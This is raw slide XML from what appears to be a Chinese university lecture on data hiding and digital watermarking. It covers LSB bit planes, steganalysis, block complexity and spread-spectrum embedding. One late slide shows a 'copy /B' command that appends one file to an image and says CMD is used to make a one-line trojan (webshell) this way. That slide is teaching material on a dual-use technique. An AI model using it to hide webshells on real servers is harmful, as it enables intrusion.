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1" r:id="rId1"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId74"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId75"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="558" r:id="rId2"/>
    <p:sldId id="559" r:id="rId3"/>
    <p:sldId id="560" r:id="rId4"/>
    <p:sldId id="561" r:id="rId5"/>
    <p:sldId id="562" r:id="rId6"/>
    <p:sldId id="627" r:id="rId7"/>
    <p:sldId id="563" r:id="rId8"/>
    <p:sldId id="564" r:id="rId9"/>
    <p:sldId id="565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616" r:id="rId26"/>
    <p:sldId id="655" r:id="rId27"/>
    <p:sldId id="617" r:id="rId28"/>
    <p:sldId id="618" r:id="rId29"/>
    <p:sldId id="619" r:id="rId30"/>
    <p:sldId id="651" r:id="rId31"/>
    <p:sldId id="620" r:id="rId32"/>
    <p:sldId id="622" r:id="rId33"/>
    <p:sldId id="621" r:id="rId34"/>
    <p:sldId id="623" r:id="rId35"/>
    <p:sldId id="656" r:id="rId36"/>
    <p:sldId id="657" r:id="rId37"/>
    <p:sldId id="658" r:id="rId38"/>
    <p:sldId id="587" r:id="rId39"/>
    <p:sldId id="600" r:id="rId40"/>
    <p:sldId id="601" r:id="rId41"/>
    <p:sldId id="624" r:id="rId42"/>
    <p:sldId id="625" r:id="rId43"/>
    <p:sldId id="603" r:id="rId44"/>
    <p:sldId id="604" r:id="rId45"/>
    <p:sldId id="605" r:id="rId46"/>
    <p:sldId id="606" r:id="rId47"/>
    <p:sldId id="607" r:id="rId48"/>
    <p:sldId id="608" r:id="rId49"/>
    <p:sldId id="475" r:id="rId50"/>
    <p:sldId id="293" r:id="rId51"/>
    <p:sldId id="659" r:id="rId52"/>
    <p:sldId id="660" r:id="rId53"/>
    <p:sldId id="661" r:id="rId54"/>
    <p:sldId id="662" r:id="rId55"/>
    <p:sldId id="663" r:id="rId56"/>
    <p:sldId id="631" r:id="rId57"/>
    <p:sldId id="670" r:id="rId58"/>
    <p:sldId id="677" r:id="rId59"/>
    <p:sldId id="678" r:id="rId60"/>
    <p:sldId id="679" r:id="rId61"/>
    <p:sldId id="676" r:id="rId62"/>
    <p:sldId id="681" r:id="rId63"/>
    <p:sldId id="683" r:id="rId64"/>
    <p:sldId id="682" r:id="rId65"/>
    <p:sldId id="680" r:id="rId66"/>
    <p:sldId id="684" r:id="rId67"/>
    <p:sldId id="632" r:id="rId68"/>
    <p:sldId id="633" r:id="rId69"/>
    <p:sldId id="635" r:id="rId70"/>
    <p:sldId id="480" r:id="rId71"/>
    <p:sldId id="418" r:id="rId72"/>
    <p:sldId id="317" r:id="rId7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6666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58" autoAdjust="0"/>
    <p:restoredTop sz="85609" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr>
        <p:scale>
          <a:sx n="68" d="100"/>
          <a:sy n="68" d="100"/>
        </p:scale>
        <p:origin x="-1274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20.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide50.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide7.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide12.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide18.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide24.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide4.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide23.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide11.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide17.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide10.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide22.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide16.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide8.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide15.xml"/><Relationship Id="rId14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>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Datahiding &amp; Digital Watermark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>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{306321EE-55F4-4AF8-9331-29243F30C8B2}" type="datetime1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>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>yangyu@bupt.edu.cn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>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{2005A5F6-3AB1-456F-B354-F2759347BD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2390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1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altLang="zh-CN"/>
              <a:t>Datahiding &amp; Digital Watermark</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN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1" sz="1300">
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle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129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1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altLang="zh-CN"/>
              <a:t>yangyu@bupt.edu.cn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1" sz="1300">
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{424EB003-50A5-4D7F-A9FC-35C5A4778E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41890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6DFC4CE-318B-4182-9806-185F1B21572B}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>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00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6C17BFD-B613-4394-873E-312F9B6905BC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005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0055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55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300" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ASCII</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1300" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>码值为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1300" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>9，不</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1300" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>可见字符</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
              <a:latin typeface="Times New Roman" pitchFamily="18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1BBA49E-87D8-4A17-B6DE-7A9455F7C2C4}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>10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824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C71E54B-7DD7-46F0-AF5B-CE89D475A696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824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8247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09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0DAE19D-D16D-4E19-86CA-0C62A99EC9AC}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>11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926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EDE6CDA-F5A6-48F5-8AB5-D7158E3678D9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927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9271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39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D21154D-3C4F-4E21-B734-CB19D0F61925}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>12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029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0782494-4D53-4DCB-A2B8-14D6DF5E8A7D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029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0295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8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D0F458D-49D5-43E3-877D-0988DB51430E}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>13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131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36F85F-37C5-4930-B521-BDE8260E1139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131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1319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6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04C379B-B5DB-4671-ADA2-F862CE706C88}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>14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23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8935648-5B3F-440C-BFA4-B742376837EF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234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2343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93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6AA1BFE-5673-4EF2-82AE-19B270F4894D}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>15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33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5B8251F-D027-4FA1-992C-FDDFC1DB6746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336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3367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89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82EF3E5-ABFF-47C9-BEF9-6AE733AB2C24}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>16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438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F56B43C-A60C-42B6-AE52-3754F43DCE52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439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4391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0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7548AF8-06E1-4280-B2FF-9D056A4A63EE}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>17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54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E14A095-EDFD-4844-B76C-B260A2453DEA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541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5415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39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5B96B3-698F-4699-BA5F-974D20CD0D4C}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>18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64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F9E45B9-4EB5-47F7-8215-BC89E4608080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643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6439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22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495F1B5-00FC-459A-BF49-2DB3DEF4FFCE}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>19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74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D736976-FF35-481D-B673-990FE090FB38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74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47463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49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ED460C4-1701-4F75-BF83-785AC24795F9}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>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10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501B38A-8A04-4242-9185-B00C09304FE9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107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1079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511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32CE635-B4C1-4D89-9286-7077868FB574}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>20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86367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08C510D-6AB6-4AAC-8D7E-1322C8F4A2A1}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>21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66210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D70CA11-9931-4134-85F3-9846FBB324CC}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>22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51255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52D7BE2-6340-43BA-8F4E-60FF9F5F07E5}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>23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8850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41B0759-8A1D-40FE-BB09-81C213A3628E}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>24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0126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Truss,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>束、捆绑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446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b="0" i="1" smtClean="0">
                        <a:latin typeface="Cambria Math"/>
                      </a:rPr>
                      <m:t>：</m:t>
                    </m:r>
                  </m:oMath>
                </a14:m>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
                  <a:t>最低位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比特平面；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dirty="0" smtClean="0"/>
                  <a:t>：次低位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比特平面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>
                    <a:latin typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                  </a:rPr>
                  <a:t>𝑥</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" smtClean="0">
                    <a:latin typeface="Cambria Math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0</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" smtClean="0">
                    <a:latin typeface="Cambria Math"/>
                  </a:rPr>
                  <a:t> [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𝑖,𝑗</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" smtClean="0">
                    <a:latin typeface="Cambria Math"/>
                  </a:rPr>
                  <a:t>]</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" smtClean="0">
                    <a:latin typeface="Cambria Math"/>
                  </a:rPr>
                  <a:t>：</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
                  <a:t>最低位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比特平面；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</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" i="0" smtClean="0">
                    <a:latin typeface="Cambria Math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zh-CN" b="0" i="0">
                    <a:latin typeface="Cambria Math"/>
                  </a:rPr>
                  <a:t> </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" i="0">
                    <a:latin typeface="Cambria Math"/>
                  </a:rPr>
                  <a:t>[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𝑖,𝑗</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" i="0">
                    <a:latin typeface="Cambria Math"/>
                  </a:rPr>
                  <a:t>]</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
                  <a:t>：次</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
                  <a:t>低位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比特平面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258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342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A81B9D72-5F02-409C-B2F5-3116CE365407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208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CEE559CE-F538-457E-BC84-A2C85E8AE56D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12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A6B5D4B-F4CA-4D4F-8902-AD46C28DD154}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>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21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6B1274-B15C-4BF2-9D18-58CC56302A2E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210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2103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60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：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" i="0" dirty="0" smtClean="0"/>
              <a:t>x(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" i="0" dirty="0" err="1" smtClean="0"/>
              <a:t>i,j</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" i="0" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>相邻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3=9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>个像素值的和与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>倍的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" i="0" dirty="0" smtClean="0"/>
              <a:t>x(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" i="0" dirty="0" err="1" smtClean="0"/>
              <a:t>i,j</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" i="0" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" i="0" dirty="0" smtClean="0"/>
              <a:t>值的差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618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提取的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>LSB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>就是隐秘信息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923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E0C07A9-FB42-454E-A5D6-689CAF539D8B}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>38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03927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804763" indent="-309524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238098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33337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28576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767A3B86-3A3D-4299-963A-F6A8C8C6E4D2}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>39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2328849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defTabSz="990478">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>相间棋盘状</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>：复杂度</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>112</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>。每行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>相邻像素对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>取值不同</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的像素对数目是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>7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行就是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*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>7=56</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>；同理，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列是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*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>7=56</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>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56=112.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B3908F0-2A8D-4A20-A4FB-832974B0F18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375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Times New Roman" pitchFamily="18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804763" indent="-309524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238098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33337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28576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E82003F7-5925-4AC8-84A4-0FEEFC518C79}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>43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670524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804763" indent="-309524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238098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33337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28576" indent="-247620" eaLnBrk="0" hangingPunct="0"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21B566D7-4F80-4819-9AB0-27B9B440D6A6}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>46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3175126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595FA4-CACD-4B61-9A13-BE470E3A9DD7}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>49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30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9D55E26-3EAB-438C-B87A-B3216EF0E4B3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3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73063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39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D8256B6-685E-452F-B4CF-48E27DCE9003}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>50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40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D9D828F-621C-47A9-9B56-F232BB7EF99B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4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74087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5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扩频通信理念：扩展带宽，降低能量</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" defTabSz="990478"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>香农公式表明</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>信道无误差传输信息的能力</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>与存在于信道中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>信噪比</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>以及</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>信道带宽</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>之间的关系：成正比。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F1C17C58-51AC-45E8-AC9D-E1D489C23CE1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16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DEFF1CF-3594-44C5-A999-0DDB45B42633}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>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31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3FE05D0-081E-4C50-9B83-D919B6617304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312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3127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284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扩频通信理念：扩展带宽，降低能量</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>干扰很强时通过提高带宽来达到同等信道容量的目的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FBC4DB99-AFA9-4023-96EE-56E6E1A02CD7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6989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扩频通信理念：扩展带宽，降低能量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ABF3D07C-311F-470D-95EF-14DDDB39891E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0096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宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>将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秘密信息扩展在整个载体中相当于整个带宽。嵌入的秘密信息的抗攻击能力强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F8BD6060-C101-4210-BEE1-4B2697E0F5E2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294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E16D72D2-A0F7-43C4-ACFF-0E0EECD62022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572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7CAA2272-C655-4F91-9916-F9875ACFA30E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968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2CCC11-07E0-4D3A-A149-3F8877AF9937}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>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41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75FAC4C-2C47-4665-9CBC-7B0C15BC13E3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415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4151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79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F1382E8-ED28-493C-97BA-38944DDBE07A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087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en-US" altLang="zh-CN" dirty="0" smtClean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935A66BA-7376-4839-884F-CFE2ACA88565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1524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C9C8E131-5304-4176-B0F4-C7BAAC99132E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60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Datahiding &amp; Digital Watermark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0279CD4-0DA1-4368-B5B9-79D8F25D8F15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yangyu@bupt.edu.cn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24EB003-50A5-4D7F-A9FC-35C5A4778E3D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686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Times New Roman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70C0223-0C12-40CB-A339-B62286B99188}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>70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61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6264C78-6EC8-4A82-A2AF-49BCB913C888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613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76135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06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2A06408-CE42-49C5-AAE3-3C6F6C43285D}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>71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71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53C157-0CCE-466C-B226-34B357E58EC5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7715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77159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5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D7A7C6C-30BA-41F2-870F-96B4AF8D10A8}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>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34434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FC542B-202B-4781-A4BD-F7A80E37C3C4}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>72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976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7715070-D5AA-410C-9FDB-0F9347E99306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9763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97639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667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45C3CA5-EE01-47FB-BF8B-B4D6602E9AB6}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>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51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ADE8F96-A5F2-4E51-AD4B-140D9A9E460A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517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5175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6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DFB7FD7-C008-4E1C-A9EC-69A76B5F44C0}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>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619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F8D38B-711B-4BF1-88B4-9A90D5A788E3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619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6199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58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(copy /B Baboo.jpg + Fruits.jpg stego.jpg)</a:t>
            </a:r>
          </a:p>
          <a:p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使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>CMD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>制作一句话木马。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参数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>/b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>指定以二进制格式复制、合并文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
